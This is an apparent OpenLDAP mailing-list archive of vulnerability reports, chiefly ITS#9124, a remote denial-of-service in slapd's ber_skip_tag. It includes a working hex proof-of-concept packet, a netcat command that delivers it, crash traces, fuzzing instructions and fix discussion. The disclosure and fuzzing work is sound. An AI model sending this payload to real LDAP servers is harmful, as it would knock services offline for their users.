Re: (ITS#9124) Unauthenticated remote denial-of-service (Null pointer dereference in ber_skip_tag)
by stephan@srlabs.de
--Apple-Mail-A7F46F22-1F3F-4DFD-A65F-8D3B7CB2FC27
Content-Type: text/plain;
charset=utf-8
Content-Transfer-Encoding: base64
V2lsbCB1c2UgdGhlIE1ham9yIFNlY3VyaXR5IGlzc3VlIGJ1dHRvbiBuZXh0IHRpbWUuIEFsc28s
IEkgd2lsbCB3YWl0IHdpdGggQ1ZFIElEIHJlcXVlc3QgdW50aWwgYSBuZXcgcmVsZWFzZSBpbmNs
dWRpbmcgdGhlIGJ1ZyBmaXgoZXMpIGlzIGF2YWlsYWJsZS4gUGxlYXNlIGxldCBtZSBrbm93IHdo
ZW4gdGhlIG5ldyByZWxlYXNlIGlzIHJlYWR5Lg0KDQpDaGVlcnMNCiAgICAtU3RlcGhhbg0KDQo+
IE9uIDI5LiBOb3YgMjAxOSwgYXQgMTY6NTAsIEhvd2FyZCBDaHUgPGh5Y0BzeW1hcy5jb20+IHdy
b3RlOg0KPiANCj4g77u/c3RlcGhhbkBzcmxhYnMuZGUgd3JvdGU6DQo+PiBOb3RlOiBBZnRlciBD
eXJ1cyBTQVNMIGZpeGVzIHRoZSBvdGhlciBpc3N1ZSAjOTEyMywgSSB3aWxsIHJlcXVlc3QgQ1ZF
IGlkPQ0KPj4gJ3MgZm9yIHRoZSB0d28gYnVncyBhbmQgc2hhcmUgdGhlbSBhcyBhIHJlZmVyZW5j
ZSBpbiB0aGUgcmVsZXZhbnQgaXNzdWVzID0NCj4+ICgjOTEyMywgIzkxMjQpDQo+IA0KPiBVc3Vh
bCBwcmFjdGljZSBmb3IgQ1ZFcyBpcyBub3QgdG8gbWFrZSB0aGVtIHB1YmxpYyB1bnRpbCBmaXhl
cyBhcmUgcmVsZWFzZWQuIEluIHRoZQ0KPiBmdXR1cmUsIHlvdSBzaG91bGQgdGljayB0aGUgTWFq
b3IgU2VjdXJpdHkgSXNzdWUgYnV0dG9uIGZvciBwb3RlbnRpYWwgQ1ZFcyBzbyB0aGV5DQo+IGNh
biBiZSBoYW5kbGVkIHByaXZhdGVseSBiZWZvcmUgcmVsZWFzZS4NCj4gDQo+IC0tIA0KPiAgLS0g
SG93YXJkIENodQ0KPiAgQ1RPLCBTeW1hcyBDb3JwLiAgICAgICAgICAgaHR0cDovL3d3dy5zeW1h
cy5jb20NCj4gIERpcmVjdG9yLCBIaWdobGFuZCBTdW4gICAgIGh0dHA6Ly9oaWdobGFuZHN1bi5j
b20vaHljLw0KPiAgQ2hpZWYgQXJjaGl0ZWN0LCBPcGVuTERBUCAgaHR0cDovL3d3dy5vcGVubGRh
cC5vcmcvcHJvamVjdC8NCg==
--Apple-Mail-A7F46F22-1F3F-4DFD-A65F-8D3B7CB2FC27
Content-Type: application/pkcs7-signature;
name=smime.p7s
Content-Disposition: attachment;
filename=smime.p7s
Content-Transfer-Encoding: base64
MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgEFADCABgkqhkiG9w0BBwEAAKCCBU8w
ggVLMIIEM6ADAgECAhBcqlOYsUipXhgfVtj/CAUVMA0GCSqGSIb3DQEBCwUAMIGCMQswCQYDVQQG
EwJJVDEPMA0GA1UECAwGTWlsYW5vMQ8wDQYDVQQHDAZNaWxhbm8xIzAhBgNVBAoMGkFjdGFsaXMg
Uy5wLkEuLzAzMzU4NTIwOTY3MSwwKgYDVQQDDCNBY3RhbGlzIENsaWVudCBBdXRoZW50aWNhdGlv
biBDQSBHMTAeFw0xOTA1MjQwODA3MTdaFw0yMDA1MjQwODA3MTdaMBwxGjAYBgNVBAMMEXN0ZXBo
YW5Ac3JsYWJzLmRlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAmniYbaUHSdjBF3/m
+2PVN14GEGxOSwHtd8WxH9mUXKEIW4XuImwNz8AoGfFOHc4DA1Tc/an6lONwAeBgj541N7aKSTxR
phKnrJrpJarbUR2FM7u7Km7btUTBT9mm6OmympB+vWKaGkjQo2Gr3GRSfVDNLP/n70H8uthbgwPL
uBfBt/dLHFrvYBpPtnH2EQqKc1SELSUPAuo9zaO/ohwPb7Sss3vMOOtePGL0lcHjWCbdsstZ/DUz
ek9MQ6F+PkGYee3JSzvyXvrADheqUPHtYPd2LPu6hZKbAGjoqRYHVbwITZIzu7QWB4YEXFCdMT6X
Ide5lvA0zR7hhb63HKUVewIDAQABo4ICIDCCAhwwDAYDVR0TAQH/BAIwADAfBgNVHSMEGDAWgBR+
YPz4bKc9Pdeuk6F5Ao+zdCk79TBLBggrBgEFBQcBAQQ/MD0wOwYIKwYBBQUHMAKGL2h0dHA6Ly9j
YWNlcnQuYWN0YWxpcy5pdC9jZXJ0cy9hY3RhbGlzLWF1dGNsaWcxMBwGA1UdEQQVMBOBEXN0ZXBo
YW5Ac3JsYWJzLmRlMEcGA1UdIARAMD4wPAYGK4EfARgBMDIwMAYIKwYBBQUHAgEWJGh0dHBzOi8v
d3d3LmFjdGFsaXMuaXQvYXJlYS1kb3dubG9hZDAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUH
AwQwgegGA1UdHwSB4DCB3TCBm6CBmKCBlYaBkmxkYXA6Ly9sZGFwMDUuYWN0YWxpcy5pdC9jbiUz
ZEFjdGFsaXMlMjBDbGllbnQlMjBBdXRoZW50aWNhdGlvbiUyMENBJTIwRzEsbyUzZEFjdGFsaXMl
MjBTLnAuQS4vMDMzNTg1MjA5NjcsYyUzZElUP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q7Ymlu
YXJ5MD2gO6A5hjdodHRwOi8vY3JsMDUuYWN0YWxpcy5pdC9SZXBvc2l0b3J5L0FVVEhDTC1HMS9n
ZXRMYXN0Q1JMMB0GA1UdDgQWBBSM25yar8W0HyQ52pQLvwam2PQI1zAOBgNVHQ8BAf8EBAMCBaAw
DQYJKoZIhvcNAQELBQADggEBADvK449WtB/GFtNr0TNrTnaNbtSuPz5poGt7nyUbneGYazzxvjBP
I0a0A+h/++rHcAuYrCNP+/M0PWU3Jv4IDf6YwHGRQdXN4f9xhCtmBnFtfQ229anlEBvLZv5uEQSz
Z6qhvZkqnq9WQ/ofb9q2GGwPfKa+QM4T8QFv5ZmogdXriH3gf4gJ1fbW7Ig33y+xYXr8W4lQ3haA
ShGzV/FleypHafb/3ptGWNq3+diGKPxNpyU1BMq904OPAEBMCa5i8+8kYsT8ug+t2uSqboWrutgr
/y4bYxBrY56cdfgnLBqoHPEBkg8ONHMgiULphoOelPbOjHD0by5aiDvNToIkdX4xggOIMIIDhAIB
ATCBlzCBgjELMAkGA1UEBhMCSVQxDzANBgNVBAgMBk1pbGFubzEPMA0GA1UEBwwGTWlsYW5vMSMw
IQYDVQQKDBpBY3RhbGlzIFMucC5BLi8wMzM1ODUyMDk2NzEsMCoGA1UEAwwjQWN0YWxpcyBDbGll
bnQgQXV0aGVudGljYXRpb24gQ0EgRzECEFyqU5ixSKleGB9W2P8IBRUwDQYJYIZIAWUDBAIBBQCg
ggHBMBgGCSqGSIb3DQEJAzELBgkqhkiG9w0BBwEwHAYJKoZIhvcNAQkFMQ8XDTE5MTEyOTE2MDgy
N1owLwYJKoZIhvcNAQkEMSIEIP3CztgLxmwa4dtGsPyVGK0Uu2reBGyuXGbCQ2TxWLdEMIGoBgkr
BgEEAYI3EAQxgZowgZcwgYIxCzAJBgNVBAYTAklUMQ8wDQYDVQQIDAZNaWxhbm8xDzANBgNVBAcM
Bk1pbGFubzEjMCEGA1UECgwaQWN0YWxpcyBTLnAuQS4vMDMzNTg1MjA5NjcxLDAqBgNVBAMMI0Fj
dGFsaXMgQ2xpZW50IEF1dGhlbnRpY2F0aW9uIENBIEcxAhBcqlOYsUipXhgfVtj/CAUVMIGqBgsq
hkiG9w0BCRACCzGBmqCBlzCBgjELMAkGA1UEBhMCSVQxDzANBgNVBAgMBk1pbGFubzEPMA0GA1UE
BwwGTWlsYW5vMSMwIQYDVQQKDBpBY3RhbGlzIFMucC5BLi8wMzM1ODUyMDk2NzEsMCoGA1UEAwwj
QWN0YWxpcyBDbGllbnQgQXV0aGVudGljYXRpb24gQ0EgRzECEFyqU5ixSKleGB9W2P8IBRUwDQYJ
KoZIhvcNAQEBBQAEggEAg+2zoDEhEy/p+izbCvXUOo0c/2HTHZsd6QvvSN/+gW5YNBEavqnvotEK
cYYUNmX5RQP6Zyg/rnsK1jatSz1Bvxf7d20+XWK+1+Nt+PGztyreTBRHabdsns/AO3qoHomJ6m84
hA3hvz4k1kacGwTc+aqLy136Qd6cIoGlsVv2kVPdbTabntbm9aG199m24QHU2Sp2JJOEheLkr3+s
wFzi3Df53zn9juhUoc/5JwkxvTyyGuWM8FOLYDfxVtjS2hd1KtooyKox4dwahwmn8aMCTU4yjBC4
2Z7GeVZ/RgeoXpzs1aB9je7b4R+XyGQimNRpQWu44y68/j4cu5pl1oiZ8gAAAAAAAA==
--Apple-Mail-A7F46F22-1F3F-4DFD-A65F-8D3B7CB2FC27--
3 years, 6 months
Re: (ITS#9124) Unauthenticated remote denial-of-service (Null pointer dereference in ber_skip_tag)
by stephan@srlabs.de
--------------ms020107020804030202050609
Content-Type: multipart/mixed;
boundary="------------B39567B16EE4CE18797C4253"
Content-Language: en-US
This is a multi-part message in MIME format.
--------------B39567B16EE4CE18797C4253
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable
Hi Ond=C5=99ej =E2=80=94
The commit 1dbf0e9441def3d6dbc0fa8fba3c2e86fa50fa19 seems to fix the null=
pointer dereference issue.
Using honggfuzz netdriver module, fuzzing of slapd can be accomplished re=
latively easy. You can follow the below instructions to fuzz the server:
1. Install honggfuzz (stable)
$ export CC=3Dhfuzz-clang
$ export CXX=3Dhfuzz-clang++
2. Apply attached patch (fuzz.patch)
3. Compile openldap
$ ./configure
$ make depend
$ make
$ make install
4. Create testcase directory including seeds (probably you have way bette=
r seeds then I have :), I just used ldap payloads extracted from some pca=
p's)
$ mkdir testcases
5. Start fuzzing
$ HFND_TCP_PORT=3D9090 honggfuzz -w ldap.wordlist -f testcases/ -- ./libe=
xec/slapd -d 1 -h ldap://127.0.0.1:9090
As you see, the fuzzing setup is relatively simple thanks to honggfuzz.
Hope this helps!
Note: After Cyrus SASL fixes the other issue #9123, I will request CVE id=
's for the two bugs and share them as a reference in the relevant issues =
(#9123, #9124)
Cheers
=C2=A0=C2=A0=C2=A0 -Stephan
On 11/29/19 1:06 PM, Ond=C5=99ej Kuzn=C3=ADk wrote:
> On Fri, Nov 29, 2019 at 09:08:15AM +0000, stephan(a)srlabs.de wrote:
>> Unauthenticated remote denial-of-service through malformed ldap packet=
>> caused by a null pointer dereference in ber_skip_tag function
>> (libraries/liblber/decode.c).
>>
>> =3D=3D4066091=3D=3D by 0x4FD051: cancel_extop (cancel.c:52)
> Hi Stephan,
> thanks for the report, this should be fixed by commit
> 1dbf0e9441def3d6dbc0fa8fba3c2e86fa50fa19 in master.
>
> Looks like you are fuzzing the server which has been on my to do list
> for a while, many thanks for that and I'm looking forward to reading
> how you did it. Would you be willing to help the project integrate your=
> work in its testing process after you've finished?
>
> Thanks,
>
--------------B39567B16EE4CE18797C4253
Content-Type: text/x-patch; charset=UTF-8;
name="fuzz.patch"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="fuzz.patch"
diff --git a/servers/slapd/main.c b/servers/slapd/main.c
index f528aa951..1941ae3de 100644
--- a/servers/slapd/main.c
+++ b/servers/slapd/main.c
@@ -349,12 +349,14 @@ usage( char *name )
);
}
=20
-#ifdef HAVE_NT_SERVICE_MANAGER
-void WINAPI ServiceMain( DWORD argc, LPTSTR *argv )
+//#ifdef HAVE_NT_SERVICE_MANAGER
+//void WINAPI ServiceMain( DWORD argc, LPTSTR *argv )
+//#else
+#ifdef HFND_FUZZING_ENTRY_FUNCTION
+HFND_FUZZING_ENTRY_FUNCTION(int argc, char **argv) {
#else
-int main( int argc, char **argv )
+int main( int argc, char **argv ) {
#endif
-{
int i, no_detach =3D 0;
int rc =3D 1;
char *urls =3D NULL;
--------------B39567B16EE4CE18797C4253--
--------------ms020107020804030202050609
Content-Type: application/pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature
MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgEFADCABgkqhkiG9w0BBwEAAKCC
C5owggVLMIIEM6ADAgECAhBcqlOYsUipXhgfVtj/CAUVMA0GCSqGSIb3DQEBCwUAMIGCMQsw
CQYDVQQGEwJJVDEPMA0GA1UECAwGTWlsYW5vMQ8wDQYDVQQHDAZNaWxhbm8xIzAhBgNVBAoM
GkFjdGFsaXMgUy5wLkEuLzAzMzU4NTIwOTY3MSwwKgYDVQQDDCNBY3RhbGlzIENsaWVudCBB
dXRoZW50aWNhdGlvbiBDQSBHMTAeFw0xOTA1MjQwODA3MTdaFw0yMDA1MjQwODA3MTdaMBwx
GjAYBgNVBAMMEXN0ZXBoYW5Ac3JsYWJzLmRlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB
CgKCAQEAmniYbaUHSdjBF3/m+2PVN14GEGxOSwHtd8WxH9mUXKEIW4XuImwNz8AoGfFOHc4D
A1Tc/an6lONwAeBgj541N7aKSTxRphKnrJrpJarbUR2FM7u7Km7btUTBT9mm6OmympB+vWKa
GkjQo2Gr3GRSfVDNLP/n70H8uthbgwPLuBfBt/dLHFrvYBpPtnH2EQqKc1SELSUPAuo9zaO/
ohwPb7Sss3vMOOtePGL0lcHjWCbdsstZ/DUzek9MQ6F+PkGYee3JSzvyXvrADheqUPHtYPd2
LPu6hZKbAGjoqRYHVbwITZIzu7QWB4YEXFCdMT6XIde5lvA0zR7hhb63HKUVewIDAQABo4IC
IDCCAhwwDAYDVR0TAQH/BAIwADAfBgNVHSMEGDAWgBR+YPz4bKc9Pdeuk6F5Ao+zdCk79TBL
BggrBgEFBQcBAQQ/MD0wOwYIKwYBBQUHMAKGL2h0dHA6Ly9jYWNlcnQuYWN0YWxpcy5pdC9j
ZXJ0cy9hY3RhbGlzLWF1dGNsaWcxMBwGA1UdEQQVMBOBEXN0ZXBoYW5Ac3JsYWJzLmRlMEcG
A1UdIARAMD4wPAYGK4EfARgBMDIwMAYIKwYBBQUHAgEWJGh0dHBzOi8vd3d3LmFjdGFsaXMu
aXQvYXJlYS1kb3dubG9hZDAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwQwgegGA1Ud
HwSB4DCB3TCBm6CBmKCBlYaBkmxkYXA6Ly9sZGFwMDUuYWN0YWxpcy5pdC9jbiUzZEFjdGFs
aXMlMjBDbGllbnQlMjBBdXRoZW50aWNhdGlvbiUyMENBJTIwRzEsbyUzZEFjdGFsaXMlMjBT
LnAuQS4vMDMzNTg1MjA5NjcsYyUzZElUP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q7Ymlu
YXJ5MD2gO6A5hjdodHRwOi8vY3JsMDUuYWN0YWxpcy5pdC9SZXBvc2l0b3J5L0FVVEhDTC1H
MS9nZXRMYXN0Q1JMMB0GA1UdDgQWBBSM25yar8W0HyQ52pQLvwam2PQI1zAOBgNVHQ8BAf8E
BAMCBaAwDQYJKoZIhvcNAQELBQADggEBADvK449WtB/GFtNr0TNrTnaNbtSuPz5poGt7nyUb
neGYazzxvjBPI0a0A+h/++rHcAuYrCNP+/M0PWU3Jv4IDf6YwHGRQdXN4f9xhCtmBnFtfQ22
9anlEBvLZv5uEQSzZ6qhvZkqnq9WQ/ofb9q2GGwPfKa+QM4T8QFv5ZmogdXriH3gf4gJ1fbW
7Ig33y+xYXr8W4lQ3haAShGzV/FleypHafb/3ptGWNq3+diGKPxNpyU1BMq904OPAEBMCa5i
8+8kYsT8ug+t2uSqboWrutgr/y4bYxBrY56cdfgnLBqoHPEBkg8ONHMgiULphoOelPbOjHD0
by5aiDvNToIkdX4wggZHMIIEL6ADAgECAggs1IrTsR4PiTANBgkqhkiG9w0BAQsFADBrMQsw
CQYDVQQGEwJJVDEOMAwGA1UEBwwFTWlsYW4xIzAhBgNVBAoMGkFjdGFsaXMgUy5wLkEuLzAz
MzU4NTIwOTY3MScwJQYDVQQDDB5BY3RhbGlzIEF1dGhlbnRpY2F0aW9uIFJvb3QgQ0EwHhcN
MTUwNTE0MDcxNDE1WhcNMzAwNTE0MDcxNDE1WjCBgjELMAkGA1UEBhMCSVQxDzANBgNVBAgM
Bk1pbGFubzEPMA0GA1UEBwwGTWlsYW5vMSMwIQYDVQQKDBpBY3RhbGlzIFMucC5BLi8wMzM1
ODUyMDk2NzEsMCoGA1UEAwwjQWN0YWxpcyBDbGllbnQgQXV0aGVudGljYXRpb24gQ0EgRzEw
ggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDA/MGJVtmI4vQEZb/NCTWrKCkw/gzK
9yerHBHuhj1d5PVsRLYMVzOVl96Iio0tqduTKpPHJ1dn6TGhL3TvWpaxnrNL6nFKpcuz5FO+
d0RpbHmF0dlwo1YbOHLkWI7gZm8aUUicUSJpj504SmONa9J5em9wOmdjDoz0Be4ejgmGMLc/
84r//lAVefO1NriJTrpGku145OAK2JELBk0rHwQV6qp9Oli98Rvgf3UTuf5jrWObR3YTx8nb
AZNpJLCNzydMjYCle6OhzO6RvaQerBoY/erlS551ZydFlzrldSEr9norfYq+tC40/fYX/kzG
S8QOcmlSee32IwTG8TOffXMNAgMBAAGjggHVMIIB0TBBBggrBgEFBQcBAQQ1MDMwMQYIKwYB
BQUHMAGGJWh0dHA6Ly9vY3NwMDUuYWN0YWxpcy5pdC9WQS9BVVRILVJPT1QwHQYDVR0OBBYE
FH5g/Phspz09166ToXkCj7N0KTv1MA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAUUtiI
OsifeGbtifN7OHCUyQICNtAwRQYDVR0gBD4wPDA6BgRVHSAAMDIwMAYIKwYBBQUHAgEWJGh0
dHBzOi8vd3d3LmFjdGFsaXMuaXQvYXJlYS1kb3dubG9hZDCB4wYDVR0fBIHbMIHYMIGWoIGT
oIGQhoGNbGRhcDovL2xkYXAwNS5hY3RhbGlzLml0L2NuJTNkQWN0YWxpcyUyMEF1dGhlbnRp
Y2F0aW9uJTIwUm9vdCUyMENBLG8lM2RBY3RhbGlzJTIwUy5wLkEuJTJmMDMzNTg1MjA5Njcs
YyUzZElUP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q7YmluYXJ5MD2gO6A5hjdodHRwOi8v
Y3JsMDUuYWN0YWxpcy5pdC9SZXBvc2l0b3J5L0FVVEgtUk9PVC9nZXRMYXN0Q1JMMA4GA1Ud
DwEB/wQEAwIBBjANBgkqhkiG9w0BAQsFAAOCAgEATZPO1SS+QRtKFlhzX2WJ8tl6PliMvMvE
D+VbFmeywUukM/JJ/Myad3PcXTpLnWW3AN75uVPByl3NSXczZqUofds6vznmS71Gvq553Jr4
cZBRPQ6GoOjYrYIAT2cFx8A3GJ+N9PxfMKgLdy1/27HeiDVa4TxZNwtkqAIy41EGYm170LhS
DTDeJeo/Orwq5FGhs0qp10+OTcSIr5AD4QUIKRrXE4uH/tw8ZMkw21rX/S7mguJdo4Ad4Au3
+ep5naRn6WLMryhO/iKflq8h/d6Vregvq+vClNxrtNnFNf3R7zTl1lA3ipFU909usGVa02jM
ftJ0t4utyg3yXYRc7rX3QYAlh3KdNzYToTKstUZwMpRf3VWYJJGuoSmlntbTlNtZEuLr7A+M
DOZOrZdKYp9qOruO5MqCSTDsUUkHKLFrQ11Jmix1BvdWQuobwQ5g5qZkuof6/u5rT66WDsU6
+IVt5nthH15E7zU7wULW4uC62XIYPb4YuOBCey+d4Oxs0BZ+SivL6qoDG9XNfk9JpCnaknnY
BogfUw3WLb+B5FI/zdNEysWTC4gzMOFfEoVC+myk1zX29xOvLOO3A/jGrRY1LhhY9LhT72Zb
5TQKCeyDH18yIk1st+V/mpJvnePcAYeeMr+onM9rf3AVNctcHrjwXfDVB/1Ht5l5NEl8JBj9
8lQxggP2MIID8gIBATCBlzCBgjELMAkGA1UEBhMCSVQxDzANBgNVBAgMBk1pbGFubzEPMA0G
A1UEBwwGTWlsYW5vMSMwIQYDVQQKDBpBY3RhbGlzIFMucC5BLi8wMzM1ODUyMDk2NzEsMCoG
A1UEAwwjQWN0YWxpcyBDbGllbnQgQXV0aGVudGljYXRpb24gQ0EgRzECEFyqU5ixSKleGB9W
2P8IBRUwDQYJYIZIAWUDBAIBBQCgggIvMBgGCSqGSIb3DQEJAzELBgkqhkiG9w0BBwEwHAYJ
KoZIhvcNAQkFMQ8XDTE5MTEyOTE0MTAwN1owLwYJKoZIhvcNAQkEMSIEIDrSxJxDsDDfl2Dd
xIYYngVgXvUxdrKLkM1iWOnau/l4MGwGCSqGSIb3DQEJDzFfMF0wCwYJYIZIAWUDBAEqMAsG
CWCGSAFlAwQBAjAKBggqhkiG9w0DBzAOBggqhkiG9w0DAgICAIAwDQYIKoZIhvcNAwICAUAw
BwYFKw4DAgcwDQYIKoZIhvcNAwICASgwgagGCSsGAQQBgjcQBDGBmjCBlzCBgjELMAkGA1UE
BhMCSVQxDzANBgNVBAgMBk1pbGFubzEPMA0GA1UEBwwGTWlsYW5vMSMwIQYDVQQKDBpBY3Rh
bGlzIFMucC5BLi8wMzM1ODUyMDk2NzEsMCoGA1UEAwwjQWN0YWxpcyBDbGllbnQgQXV0aGVu
dGljYXRpb24gQ0EgRzECEFyqU5ixSKleGB9W2P8IBRUwgaoGCyqGSIb3DQEJEAILMYGaoIGX
MIGCMQswCQYDVQQGEwJJVDEPMA0GA1UECAwGTWlsYW5vMQ8wDQYDVQQHDAZNaWxhbm8xIzAh
BgNVBAoMGkFjdGFsaXMgUy5wLkEuLzAzMzU4NTIwOTY3MSwwKgYDVQQDDCNBY3RhbGlzIENs
aWVudCBBdXRoZW50aWNhdGlvbiBDQSBHMQIQXKpTmLFIqV4YH1bY/wgFFTANBgkqhkiG9w0B
AQEFAASCAQA9zDrxcLY4Ki274n/uD+urTRlasoNsnPmLUzyOVtR+ieq0ucB4w+cx+an6hFbT
u6hnr40a88cUfyw4em6KKk5rXfsMM/fPJs1na9KPlnS1Dw9+HpSOERVavlJ1N/Vut9uqpqxc
vXLgSdYB5LR1QF2PzAm7SLIWt5gIMjSvAJboWmt9/Dgc+cccbcyt5Th5wFcH5wHXt4xOSUQY
e3aWRJGwTXv4WCqeSXE1zzOlQvJNamaD70U21MX6Lb3Nk4mqJ33G388kJfu6lIr7VhDQGl0f
muENH+M5tPH0QzBRq1E6SmvcDh4iB4AlIMj4yWE/Uxl83QZ0XpJt3GpDdtJmsffKAAAAAAAA
--------------ms020107020804030202050609--
3 years, 6 months
Re: (ITS#9124) Unauthenticated remote denial-of-service (Null pointer dereference in ber_skip_tag)
by ondra@mistotebe.net
On Fri, Nov 29, 2019 at 09:08:15AM +0000, stephan(a)srlabs.de wrote:
> Unauthenticated remote denial-of-service through malformed ldap packet
> caused by a null pointer dereference in ber_skip_tag function
> (libraries/liblber/decode.c).
>
> ==4066091== by 0x4FD051: cancel_extop (cancel.c:52)
Hi Stephan,
thanks for the report, this should be fixed by commit
1dbf0e9441def3d6dbc0fa8fba3c2e86fa50fa19 in master.
Looks like you are fuzzing the server which has been on my to do list
for a while, many thanks for that and I'm looking forward to reading
how you did it. Would you be willing to help the project integrate your
work in its testing process after you've finished?
Thanks,
--
Ondřej Kuzník
Senior Software Engineer
Symas Corporation http://www.symas.com
Packaged, certified, and supported LDAP solutions powered by OpenLDAP
3 years, 6 months
(ITS#9124) Unauthenticated remote denial-of-service (Null pointer dereference in ber_skip_tag)
by stephan@srlabs.de
Full_Name: Stephan Zeisberg
Version: 2.4.48
OS: Fedora 31 (kernel 5.3.11-300.fc31.x86_64)
URL:
Submission from: (NULL) (217.228.59.1)
# Issue description
Unauthenticated remote denial-of-service through malformed ldap packet caused by
a null pointer dereference in ber_skip_tag function
(libraries/liblber/decode.c).
# Version
openldap-2.4.48.tgz
# How to reproduce
## Compile
$ tar xzvf openldap-2.4.48.tgz
$ cd openldap-2.4.48
$ ./configure --prefix=/tmp/openldap
$ make depend
$ make
$ make install
$ cd /tmp/openldap
## Start server
$ ./libexec/slapd -d 1 -h ldap://127.0.0.1:9091
## Create PoC crash file
$ echo -n "3084000000b902022da277072d0b312e332e362e312e312e38810038303132353339313934303339cb36352e2e2e2e2e2e2e2ec8a6134cba3e07b6bc691e2e79a9a3f6d0bb7b5d789a8be1058da4a448206401aadcc21bc939ba86a2f30c64f585b9e65fafb0a10d8427736b1bc0422868aa1fda601953d87aa638228bc4ae2dc2f85be810f282847bcab689fb75755eed809d8e284b647ee3c76b52bd6e309d4fa7a2437cf195f6682b4bd303d2de1654160613adb2744b9632515871278b01671ca5a8faf18f736964d34f8da5d40370ec68f2b68b47fe1f2b6d1a04359f54ad827ae21963768ef1f854e03f173e1f57c1b04c5b3dd2a736bb6ea159e5000000000000000272af3a4164acbf51b0b27c7d1ed9ce4b52b0a6b0a4d678fecd8112dd6c4d00"
| xxd -r -p > ldap.crash
## Execute PoC (may need to be executed multiple times)
$ nc 127.0.0.1 9091 < ldap.crash
# Valgrind + UBSAN
5de0ddc3 connection_read(12): checking for input on id=1000
ber_get_next
ber_scanf fmt ({i}) ber:
==4066091== Thread 3:
==4066091== Invalid read of size 1
==4066091== at 0x63E1DF: ber_skip_tag (decode.c:256)
==4066091== by 0x63F7A8: ber_scanf (decode.c:865)
==4066091== by 0x4FD051: cancel_extop (cancel.c:52)
==4066091== by 0x4BE530: fe_extended (extended.c:222)
==4066091== by 0x4BE36B: do_extended (extended.c:177)
==4066091== by 0x472CA7: connection_operation (connection.c:1158)
==4066091== by 0x471331: connection_read_thread (connection.c:1294)
==4066091== by 0x5FEE79: ldap_int_thread_pool_wrapper (tpool.c:696)
==4066091== by 0xCA384E1: start_thread (in /usr/lib64/libpthread-2.30.so)
==4066091== by 0xCCC6692: clone (in /usr/lib64/libc-2.30.so)
==4066091== Address 0x0 is not stack'd, malloc'd or (recently) free'd
==4066091==
UndefinedBehaviorSanitizer5de0ddc3 ber_get_next on fd 12 failed errno=0
(Success)
:DEADLYSIGNAL
==4066091==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address
0x000000000000 (pc 0x00000063e1df bp 0x00004ee77660 sp 0x00004ee77640 T4066125)
==4066091==The signal is caused by a READ memory access.
==4066091==Hint: address points to the zero page.
==4066129== Warning: invalid file descriptor 1024 in syscall close()
#0 0x63e1de in ber_skip_tag
/tmp/openldap-2.4.48/libraries/liblber/decode.c:255:15
#1 0x63f7a8 in ber_scanf
/tmp/openldap-2.4.48/libraries/liblber/decode.c:865:10
#2 0x4fd051 in cancel_extop
/tmp/openldap-2.4.48/servers/slapd/cancel.c:52:7
#3 0x4be530 in fe_extended
/tmp/openldap-2.4.48/servers/slapd/extended.c:222:16
#4 0x4be36b in do_extended
/tmp/openldap-2.4.48/servers/slapd/extended.c:177:15
#5 0x472ca7 in connection_operation
/tmp/openldap-2.4.48/servers/slapd/connection.c:1158:7
#6 0x471331 in connection_read_thread
/tmp/openldap-2.4.48/servers/slapd/connection.c:1294:14
#7 0x5fee79 in ldap_int_thread_pool_wrapper
/tmp/openldap-2.4.48/libraries/libldap_r/tpool.c:696:3
#8 0xca384e1 in start_thread (/lib64/libpthread.so.0+0x94e1)
#9 0xccc6692 in clone (/lib64/libc.so.6+0x101692)
UndefinedBehaviorSanitizer can not provide additional info.
Please let me know what additional information I can provide to successfully
reproduce the issue.
Note: I have also tested and reproduced the issue using the precompiled package
from the Fedora repositories: openldap-servers-2.4.47-3.fc31.x86_64 (OpenLDAP:
slapd 2.4.47 (Jul 25 2019 00:00:00))
-Stephan Zeisberg
3 years, 6 months
Re: (ITS#9120) Searches including generalizedTime attributes with index
by hyc@symas.com
Howard Chu wrote:
> Howard Chu wrote:
>> markus.widmer(a)daasi.de wrote:
>
>>> We could reproduce this with 2.4.42, 2.4.44 and 2.4.48. We hope you can
>>> reproduce this as well to see what is happening here.
>>
>> Yes, can reproduce this. The function that converts a component-wise time
>> into a timet is referencing time since 1970. The date in 1956 would yield a
>> negative timet value but the fields are unsigned ints, so instead it's treated
>> as 17,000 years in the future. We can probably change this to handle signed
>> timestamps but need to consider this further.
>>
> I believe the best way forward would be to allow signed values, and also to switch
> our epoch reference from 1970-01-01 to 0000-01-01 (i.e., use Gregorian Proleptic calendar).
> Year zero would be 1 BCE in this calendar, and anything earlier would be a negative year.
>
> Changing these functions will require regenerating any indices. Looks like something
> we'll rewrite for 2.5 but leave 2.4 alone.
Fixed in git master commit 97c145919d8c702003b9cd8bac0e01083d3ab9a1
The time is now calculated with signed years, but the result is still returned
as an unsigned value (with negative years properly sorting as less than positive
years).
Note that the slapd schema validator still rejects negative years at the moment.
Will need to look further at that later.
--
-- Howard Chu
CTO, Symas Corp. http://www.symas.com
Director, Highland Sun http://highlandsun.com/hyc/
Chief Architect, OpenLDAP http://www.openldap.org/project/
3 years, 6 months
Re: (ITS#9123) Unauthenticated remote denial-of-service
by stephan@srlabs.de
--------------ms050304040807030706080402
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable
Content-Language: en-US
Created an issue upstream [1] and included the valgrind output and propos=
ed patch.
[1] https://github.com/cyrusimap/cyrus-sasl/issues/587
=C2=A0=C2=A0=C2=A0 -Stephan
On 11/28/19 4:16 PM, Howard Chu wrote:
> 5ddfddde do_bind: dn () SASL mech <garbage>
> 5ddfddde =3D=3D> sasl_bind: dn=3D"" mech=3D<garbage>
